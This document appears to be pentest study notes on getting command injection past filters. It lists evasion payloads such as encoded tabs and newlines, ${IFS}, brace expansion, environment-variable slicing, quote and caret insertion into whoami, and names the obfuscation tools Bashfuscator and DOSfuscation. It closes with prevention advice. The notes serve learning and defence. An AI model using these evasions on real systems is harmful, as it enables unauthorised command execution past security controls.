filter-bypass
Bypassing space filters (linux)
METHOD1
Using Tabs
Try to add one character at a time and see one is not blacklisted.
If space character is blocked, we can use tab which work on both linux and windows.
%0a%09 #
newline and tab%09 #
tab%20 #
space
METHOD2
Using $IFS It is a linux environment variable may also work since it is default value in a space and a tab.
%0a${IFS}
${IFS}
$IFS
$IFS$9
METHOD3
Using Brace Expansion
We can use brace expansion feature, which automatically adds spaces between arguments wrapped b/w braces
{ls,-la}
%0a{ls,-la}
Bypass slash/add slashes (linux)
Print environment variables
env, printenv
We can add slashes using environment variables
${PATH:0:1}
We can do the same with $HOME or $PWD
${LS_COLORS:10:1}
NOTE: you can look at the environment variable to find useful characters
Bypass semi-colon/add semi-colon (linux)
Character shifting
man ascii
echo $(tr '!-}' '"-~'<<<[)
Windows
Bypass slashes/add slashes
CMD
echo %HOMEPATH:~6,-11%
Powershell
$env:HOMEPATH[0]
We can also use Get-ChildItem Env:
Bypassing blacklisted commands
Bypass command blacklist:
Using single and double quotes (windows & linux)
w'h'o'am'i
w"h"o"am"I
Note: we cannot mix types of quotes and the number of quotes must be even.
Using positional parameters and forward slash (linux):
w\ho\am\i
Who$@ami
Using caret character (windows CMD):
wh^o^am^i
Advanced command obfuscation (Dealing with WAF)
Linux systems are case-sensitive
Case manipulation:
Windows Powershell
It uses alternating b/w cases
Linux
Reversed commands:
Linux
Windows powershell
Encoded commands:
This time, we will create our own unique obfuscation commands. It is much less likely to be denied by a filter or a WAF. We will utilize various encoding tools, such as base64, xxd (hex encoding).
Linux:
Base64
Utf-16 and base64
It convert strings from utf-8 to utf-16 before base64
we are using <<< to avoid using a pipe |, which is a filtered character.
IF base64, bash is filtered so we can use character insertion, or use other alternatives like SH and openssl, or xxd for encoding.
Windows powershell:
Base64
Other techniques
Automated obfuscation tools
Bashfuscator (linux)
DOSfuscation (windows)
Import-DOSfuscation - Help - Try running obfuscated command on CMD
Command injection Prevention
System commands
Input validation
filter_var function in PHP
Use regular expression
Is-ip library in NodeJS
Input sanitization
preg_replace('/[^A-Za-z0-9.]/', '', $_GET['ip']); (PHP)It removes special characters
dompurify library in NodeJS
use the escapeshellcmd filter to escape any special characters, so they cannot cause any injections. For NodeJS, we can simply use the escape(ip) function. However, as we have seen in this module, escaping special characters is usually not considered a secure practice, as it can often be bypassed through various techniques.
Server configuration
Use web server build-in WAF, mod_security
Abide by the Principle of Least Privilege (PoLP) by running the web server as a low privileged.
Prevent certain functions from being executed by the web server (disable_functions=system,……)
Limit the scope accessible by the web application to its folder (eg. In PHP open_basedir=
'/var/www/html')Rejects double-encoded requests and non-ASCII characters in URLs
Avoid the use of sensitive/outdated libraries and module (e.g PHP CGI)
Last updated